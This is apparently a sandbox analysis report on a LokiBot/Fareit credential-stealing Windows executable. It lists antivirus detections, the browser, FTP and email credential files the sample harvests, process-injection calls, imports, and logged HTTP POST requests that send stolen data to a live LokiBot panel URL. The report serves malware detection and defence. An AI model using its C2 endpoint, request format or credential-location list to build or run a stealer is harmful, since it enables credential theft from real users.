13.2
0-day
60 个模型检测该样本为恶意!
重新分析
更多

09ed1487ad28e1dffabd42618c997fe3d110ddb12e9cbc7d42ff5b2e7c74e010

c3eaf9846f5f3cea2361dc3fb3c6773b.exe

分析耗时

91s

最近分析

文件大小

871.0KB
静态报毒 动态报毒 100% 2GW@AIDM5PNI AI SCORE=86 ANDROM AUTO AWGP BTPAZW CONFIDENCE DELPHILESS EDUW FAREIT GENERICKD HFHJZD HIGH CONFIDENCE ICUUJ IGENT KLVY KTSE LOKI LOKIBOT MALICIOUS PE MALWARE@#26FJPB19XJURF PASSWORDSTEALER PUQS26 PUTTY R + TROJ SCORE SIGGEN9 SMDF STATIC AI SUSGEN UNSAFE X2059 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Backdoor:Win32/Androm.9e0518c6 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201228 21.1.5827.0
Kingsoft 20201228 2017.9.26.565
McAfee Fareit-FRQ!C3EAF9846F5F 20201228 6.0.6.653
Tencent Win32.Trojan.Inject.Auto 20201228 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (3 个事件)
Time & API Arguments Status Return Repeated
1619867300.46075
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619867301.83575
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619867302.60175
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619867297.14875
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619867293.554875
__exception__
stacktrace: 
c3eaf9846f5f3cea2361dc3fb3c6773b+0x98ef2 @ 0x498ef2
c3eaf9846f5f3cea2361dc3fb3c6773b+0x3e1b @ 0x403e1b
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 1637912
registers.edi: 4820772
registers.eax: 0
registers.ebp: 1638204
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 86
registers.ecx: 347406336
exception.instruction_r: f7 f0 90 90 90 90 33 c0 5a 59 59 64 89 10 eb 15
exception.symbol: c3eaf9846f5f3cea2361dc3fb3c6773b+0x98cd4
exception.instruction: div eax
exception.module: c3eaf9846f5f3cea2361dc3fb3c6773b.exe
exception.exception_code: 0xc0000094
exception.offset: 625876
exception.address: 0x498cd4
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://fllxprint.com/loki/Panel/fre.php
Performs some HTTP requests (1 个事件)
request POST http://fllxprint.com/loki/Panel/fre.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://fllxprint.com/loki/Panel/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619867293.288875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619867293.601875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005e0000
success 0 0
1619867294.460875
NtAllocateVirtualMemory
process_identifier: 2440
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00600000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619867302.55475
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.155913005727606 section {'size_of_data': '0x00026a00', 'virtual_address': '0x000b9000', 'entropy': 7.155913005727606, 'name': '.rsrc', 'virtual_size': '0x0002694c'} description A section with a high entropy has been found
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1619867301.52375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 2440 called NtSetContextThread to modify thread in remote process 2476
Time & API Arguments Status Return Repeated
1619867294.741875
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2476
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 2440 resumed a thread in remote process 2476
Time & API Arguments Status Return Repeated
1619867295.366875
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2476
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619867294.726875
CreateProcessInternalW
thread_identifier: 1816
thread_handle: 0x00000100
process_identifier: 2476
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c3eaf9846f5f3cea2361dc3fb3c6773b.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000104
inherit_handles: 0
success 1 0
1619867294.726875
NtUnmapViewOfSection
process_identifier: 2476
region_size: 4096
process_handle: 0x00000104
base_address: 0x00400000
success 0 0
1619867294.726875
NtMapViewOfSection
section_handle: 0x0000010c
process_identifier: 2476
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000104
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619867294.741875
NtGetContextThread
thread_handle: 0x00000100
success 0 0
1619867294.741875
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2476
success 0 0
1619867295.366875
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2476
success 0 0
1619867298.24175
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2476
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.PasswordStealer.GenericKD.45109841
CAT-QuickHeal Backdoor.Androm
ALYac Trojan.PasswordStealer.GenericKD.45109841
Cylance Unsafe
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Androm.9e0518c6
K7GW Riskware ( 0040eff71 )
Cybereason malicious.46f5f3
Arcabit Trojan.PasswordStealer.Generic.D2B05251
Cyren W32/Trojan.KLVY-6700
Symantec Trojan.Gen.2
APEX Malicious
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Trojan.PasswordStealer.GenericKD.45109841
NANO-Antivirus Trojan.Win32.Androm.hfhjzd
Paloalto generic.ml
AegisLab Trojan.Win32.Androm.m!c
Rising Trojan.Lokibot!8.F1B5 (KTSE)
Ad-Aware Trojan.PasswordStealer.GenericKD.45109841
Sophos Mal/Generic-R + Troj/Fareit-KBT
Comodo Malware@#26fjpb19xjurf
F-Secure Trojan.TR/Agent.icuuj
DrWeb Trojan.Siggen9.22410
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.LOKI.SMDF.hp
McAfee-GW-Edition BehavesLike.Win32.Fareit.ch
MaxSecure Trojan.Malware.300983.susgen
FireEye Generic.mg.c3eaf9846f5f3cea
Emsisoft Trojan.PasswordStealer.GenericKD.45109841 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Backdoor.Androm.awgp
Webroot W32.Trojan.Gen
Avira TR/Agent.icuuj
MAX malware (ai score=86)
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Gridinsoft Trojan.Win32.LokiBot.oa!s1
Microsoft Trojan:Win32/Loki.XR!MTB
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Win32.Trojan.Agent.PUQS26
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
McAfee Fareit-FRQ!C3EAF9846F5F
VBA32 Backdoor.Androm
Malwarebytes Spyware.LokiBot
Zoner Trojan.Win32.89982
ESET-NOD32 Win32/PSW.Fareit.L
TrendMicro-HouseCall TrojanSpy.Win32.LOKI.SMDF.hp
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.24.14:443
dead_host 172.217.27.142:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-04-24 04:34:54

Imports

Library kernel32.dll:
0x4a7164 VirtualFree
0x4a7168 VirtualAlloc
0x4a716c LocalFree
0x4a7170 LocalAlloc
0x4a7174 GetVersion
0x4a7178 GetCurrentThreadId
0x4a7184 VirtualQuery
0x4a7188 WideCharToMultiByte
0x4a718c MultiByteToWideChar
0x4a7190 lstrlenA
0x4a7194 lstrcpynA
0x4a7198 LoadLibraryExA
0x4a719c GetThreadLocale
0x4a71a0 GetStartupInfoA
0x4a71a4 GetProcAddress
0x4a71a8 GetModuleHandleA
0x4a71ac GetModuleFileNameA
0x4a71b0 GetLocaleInfoA
0x4a71b4 GetCommandLineA
0x4a71b8 FreeLibrary
0x4a71bc FindFirstFileA
0x4a71c0 FindClose
0x4a71c4 ExitProcess
0x4a71c8 WriteFile
0x4a71d0 RtlUnwind
0x4a71d4 RaiseException
0x4a71d8 GetStdHandle
Library user32.dll:
0x4a71e0 GetKeyboardType
0x4a71e4 LoadStringA
0x4a71e8 MessageBoxA
0x4a71ec CharNextA
Library advapi32.dll:
0x4a71f4 RegQueryValueExA
0x4a71f8 RegOpenKeyExA
0x4a71fc RegCloseKey
Library oleaut32.dll:
0x4a7204 SysFreeString
0x4a7208 SysReAllocStringLen
0x4a720c SysAllocStringLen
Library kernel32.dll:
0x4a7214 TlsSetValue
0x4a7218 TlsGetValue
0x4a721c LocalAlloc
0x4a7220 GetModuleHandleA
Library advapi32.dll:
0x4a7228 RegQueryValueExA
0x4a722c RegOpenKeyExA
0x4a7230 RegCloseKey
Library kernel32.dll:
0x4a7238 lstrcpyA
0x4a723c WriteFile
0x4a7240 WaitForSingleObject
0x4a7244 VirtualQuery
0x4a7248 VirtualFree
0x4a724c VirtualAlloc
0x4a7250 Sleep
0x4a7254 SizeofResource
0x4a7258 SetThreadLocale
0x4a725c SetFilePointer
0x4a7260 SetEvent
0x4a7264 SetErrorMode
0x4a7268 SetEndOfFile
0x4a726c SearchPathA
0x4a7270 ResetEvent
0x4a7274 ReleaseMutex
0x4a7278 ReadFile
0x4a727c OpenFileMappingA
0x4a7280 MultiByteToWideChar
0x4a7284 MulDiv
0x4a7288 LockResource
0x4a728c LoadResource
0x4a7290 LoadLibraryA
0x4a7298 IsDBCSLeadByte
0x4a72a0 GlobalUnlock
0x4a72a4 GlobalSize
0x4a72a8 GlobalReAlloc
0x4a72ac GlobalHandle
0x4a72b0 GlobalLock
0x4a72b4 GlobalFree
0x4a72b8 GlobalFindAtomA
0x4a72bc GlobalDeleteAtom
0x4a72c0 GlobalAlloc
0x4a72c4 GlobalAddAtomA
0x4a72c8 GetVersionExA
0x4a72cc GetVersion
0x4a72d0 GetUserDefaultLCID
0x4a72d4 GetTickCount
0x4a72d8 GetThreadLocale
0x4a72dc GetSystemInfo
0x4a72e0 GetStringTypeExA
0x4a72e4 GetStdHandle
0x4a72e8 GetProcAddress
0x4a72ec GetModuleHandleA
0x4a72f0 GetModuleFileNameA
0x4a72f4 GetLocaleInfoA
0x4a72f8 GetLocalTime
0x4a72fc GetLastError
0x4a7300 GetFullPathNameA
0x4a7304 GetDiskFreeSpaceA
0x4a7308 GetDateFormatA
0x4a730c GetCurrentThreadId
0x4a7310 GetCurrentProcessId
0x4a7318 GetComputerNameA
0x4a731c GetCPInfo
0x4a7320 GetACP
0x4a7324 FreeResource
0x4a732c InterlockedExchange
0x4a7334 FreeLibrary
0x4a7338 FormatMessageA
0x4a733c FindResourceA
0x4a7340 FindFirstFileA
0x4a7344 FindClose
0x4a7348 FatalAppExitA
0x4a734c EnumCalendarInfoA
0x4a7358 CreateThread
0x4a735c CreateMutexA
0x4a7360 CreateFileA
0x4a7364 CreateEventA
0x4a7368 CompareStringA
0x4a736c CloseHandle
Library version.dll:
0x4a7374 VerQueryValueA
0x4a737c GetFileVersionInfoA
Library gdi32.dll:
0x4a7384 UnrealizeObject
0x4a7388 StretchBlt
0x4a738c SetWindowOrgEx
0x4a7390 SetWinMetaFileBits
0x4a7394 SetViewportOrgEx
0x4a7398 SetTextColor
0x4a739c SetStretchBltMode
0x4a73a0 SetROP2
0x4a73a4 SetPixel
0x4a73a8 SetMapMode
0x4a73ac SetEnhMetaFileBits
0x4a73b0 SetDIBColorTable
0x4a73b4 SetBrushOrgEx
0x4a73b8 SetBkMode
0x4a73bc SetBkColor
0x4a73c0 SelectPalette
0x4a73c4 SelectObject
0x4a73c8 SaveDC
0x4a73cc RestoreDC
0x4a73d0 Rectangle
0x4a73d4 RectVisible
0x4a73d8 RealizePalette
0x4a73dc PlayEnhMetaFile
0x4a73e0 PatBlt
0x4a73e4 MoveToEx
0x4a73e8 MaskBlt
0x4a73ec LineTo
0x4a73f0 LPtoDP
0x4a73f4 IntersectClipRect
0x4a73f8 GetWindowOrgEx
0x4a73fc GetWinMetaFileBits
0x4a7400 GetTextMetricsA
0x4a740c GetStockObject
0x4a7410 GetPixel
0x4a7414 GetPaletteEntries
0x4a7418 GetObjectA
0x4a7428 GetEnhMetaFileBits
0x4a742c GetDeviceCaps
0x4a7430 GetDIBits
0x4a7434 GetDIBColorTable
0x4a7438 GetDCOrgEx
0x4a7440 GetClipBox
0x4a7444 GetBrushOrgEx
0x4a7448 GetBitmapBits
0x4a744c ExcludeClipRect
0x4a7450 DeleteObject
0x4a7454 DeleteEnhMetaFile
0x4a7458 DeleteDC
0x4a745c CreateSolidBrush
0x4a7460 CreatePenIndirect
0x4a7464 CreatePen
0x4a7468 CreatePalette
0x4a7470 CreateFontIndirectA
0x4a7474 CreateEnhMetaFileA
0x4a7478 CreateDIBitmap
0x4a747c CreateDIBSection
0x4a7480 CreateCompatibleDC
0x4a7488 CreateBrushIndirect
0x4a748c CreateBitmap
0x4a7490 CopyEnhMetaFileA
0x4a7494 CloseEnhMetaFile
0x4a7498 BitBlt
Library opengl32.dll:
0x4a74a0 wglDeleteContext
Library user32.dll:
0x4a74a8 CreateWindowExA
0x4a74ac WindowFromPoint
0x4a74b0 WinHelpA
0x4a74b4 WaitMessage
0x4a74b8 ValidateRect
0x4a74bc UpdateWindow
0x4a74c0 UnregisterClassA
0x4a74c4 UnhookWindowsHookEx
0x4a74c8 TranslateMessage
0x4a74d0 TrackPopupMenu
0x4a74d8 ShowWindow
0x4a74dc ShowScrollBar
0x4a74e0 ShowOwnedPopups
0x4a74e4 ShowCursor
0x4a74e8 SetWindowsHookExA
0x4a74ec SetWindowPos
0x4a74f0 SetWindowPlacement
0x4a74f4 SetWindowLongA
0x4a74f8 SetTimer
0x4a74fc SetScrollRange
0x4a7500 SetScrollPos
0x4a7504 SetScrollInfo
0x4a7508 SetRect
0x4a750c SetPropA
0x4a7510 SetParent
0x4a7514 SetMenuItemInfoA
0x4a7518 SetMenu
0x4a751c SetForegroundWindow
0x4a7520 SetFocus
0x4a7524 SetCursor
0x4a7528 SetClassLongA
0x4a752c SetCapture
0x4a7530 SetActiveWindow
0x4a7534 SendMessageA
0x4a7538 ScrollWindow
0x4a753c ScreenToClient
0x4a7540 RemovePropA
0x4a7544 RemoveMenu
0x4a7548 ReleaseDC
0x4a754c ReleaseCapture
0x4a7558 RegisterClassA
0x4a755c RedrawWindow
0x4a7560 PtInRect
0x4a7564 PostQuitMessage
0x4a7568 PostMessageA
0x4a756c PeekMessageA
0x4a7570 OffsetRect
0x4a7574 OemToCharBuffA
0x4a7578 OemToCharA
0x4a757c MessageBoxA
0x4a7580 MapWindowPoints
0x4a7584 MapVirtualKeyA
0x4a7588 LoadStringA
0x4a758c LoadKeyboardLayoutA
0x4a7590 LoadIconA
0x4a7594 LoadCursorA
0x4a7598 LoadBitmapA
0x4a759c KillTimer
0x4a75a0 IsZoomed
0x4a75a4 IsWindowVisible
0x4a75a8 IsWindowEnabled
0x4a75ac IsWindow
0x4a75b0 IsRectEmpty
0x4a75b4 IsIconic
0x4a75b8 IsDialogMessageA
0x4a75bc IsChild
0x4a75c0 InvalidateRect
0x4a75c4 IntersectRect
0x4a75c8 InsertMenuItemA
0x4a75cc InsertMenuA
0x4a75d0 InflateRect
0x4a75d8 GetWindowTextA
0x4a75dc GetWindowRect
0x4a75e0 GetWindowPlacement
0x4a75e4 GetWindowLongA
0x4a75e8 GetWindowDC
0x4a75ec GetTopWindow
0x4a75f0 GetSystemMetrics
0x4a75f4 GetSystemMenu
0x4a75f8 GetSysColorBrush
0x4a75fc GetSysColor
0x4a7600 GetSubMenu
0x4a7604 GetScrollRange
0x4a7608 GetScrollPos
0x4a760c GetScrollInfo
0x4a7610 GetPropA
0x4a7614 GetParent
0x4a7618 GetWindow
0x4a761c GetMessageTime
0x4a7620 GetMenuStringA
0x4a7624 GetMenuState
0x4a7628 GetMenuItemInfoA
0x4a762c GetMenuItemID
0x4a7630 GetMenuItemCount
0x4a7634 GetMenu
0x4a7638 GetLastActivePopup
0x4a763c GetKeyboardState
0x4a7644 GetKeyboardLayout
0x4a7648 GetKeyState
0x4a764c GetKeyNameTextA
0x4a7650 GetIconInfo
0x4a7654 GetForegroundWindow
0x4a7658 GetFocus
0x4a765c GetDesktopWindow
0x4a7660 GetDCEx
0x4a7664 GetDC
0x4a7668 GetCursorPos
0x4a766c GetCursor
0x4a7670 GetClipboardData
0x4a7674 GetClientRect
0x4a7678 GetClassNameA
0x4a767c GetClassInfoA
0x4a7680 GetCapture
0x4a7684 GetActiveWindow
0x4a7688 FrameRect
0x4a768c FindWindowA
0x4a7690 FillRect
0x4a7694 EqualRect
0x4a7698 EnumWindows
0x4a769c EnumThreadWindows
0x4a76a0 EndPaint
0x4a76a4 EnableWindow
0x4a76a8 EnableScrollBar
0x4a76ac EnableMenuItem
0x4a76b0 DrawTextA
0x4a76b4 DrawMenuBar
0x4a76b8 DrawIconEx
0x4a76bc DrawIcon
0x4a76c0 DrawFrameControl
0x4a76c4 DrawEdge
0x4a76c8 DispatchMessageA
0x4a76cc DestroyWindow
0x4a76d0 DestroyMenu
0x4a76d4 DestroyIcon
0x4a76d8 DestroyCursor
0x4a76dc DeleteMenu
0x4a76e0 DefWindowProcA
0x4a76e4 DefMDIChildProcA
0x4a76e8 DefFrameProcA
0x4a76ec CreatePopupMenu
0x4a76f0 CreateMenu
0x4a76f4 CreateIcon
0x4a76f8 ClientToScreen
0x4a76fc CheckMenuItem
0x4a7700 CallWindowProcA
0x4a7704 CallNextHookEx
0x4a7708 BeginPaint
0x4a770c CharNextA
0x4a7710 CharLowerBuffA
0x4a7714 CharLowerA
0x4a7718 CharUpperBuffA
0x4a771c CharToOemBuffA
0x4a7720 CharToOemA
0x4a7724 AdjustWindowRectEx
Library kernel32.dll:
0x4a7730 Sleep
Library oleaut32.dll:
0x4a7738 SafeArrayPtrOfIndex
0x4a773c SafeArrayPutElement
0x4a7740 SafeArrayGetElement
0x4a7748 SafeArrayAccessData
0x4a774c SafeArrayGetUBound
0x4a7750 SafeArrayGetLBound
0x4a7754 SafeArrayCreate
0x4a7758 VariantChangeType
0x4a775c VariantCopyInd
0x4a7760 VariantCopy
0x4a7764 VariantClear
0x4a7768 VariantInit
Library ole32.dll:
0x4a7774 IsAccelerator
0x4a7778 OleDraw
0x4a7780 CoTaskMemFree
0x4a7784 ProgIDFromCLSID
0x4a7788 StringFromCLSID
0x4a778c CoCreateInstance
0x4a7790 CoGetClassObject
0x4a7794 CoUninitialize
0x4a7798 CoInitialize
0x4a779c IsEqualGUID
Library oleaut32.dll:
0x4a77a4 GetErrorInfo
0x4a77a8 GetActiveObject
0x4a77ac SysFreeString
Library comctl32.dll:
0x4a77bc ImageList_Write
0x4a77c0 ImageList_Read
0x4a77d0 ImageList_DragMove
0x4a77d4 ImageList_DragLeave
0x4a77d8 ImageList_DragEnter
0x4a77dc ImageList_EndDrag
0x4a77e0 ImageList_BeginDrag
0x4a77e4 ImageList_Remove
0x4a77e8 ImageList_DrawEx
0x4a77ec ImageList_Draw
0x4a77fc ImageList_Add
0x4a7804 ImageList_Destroy
0x4a7808 ImageList_Create
0x4a780c InitCommonControls

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 162.255.119.154 fllxprint.com 80
192.168.56.101 49182 162.255.119.154 fllxprint.com 80
192.168.56.101 49183 162.255.119.154 fllxprint.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://fllxprint.com/loki/Panel/fre.php 
POST /loki/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fllxprint.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C51FDD8
Content-Length: 196
Connection: close
http://fllxprint.com/loki/Panel/fre.php 
POST /loki/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fllxprint.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C51FDD8
Content-Length: 169
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.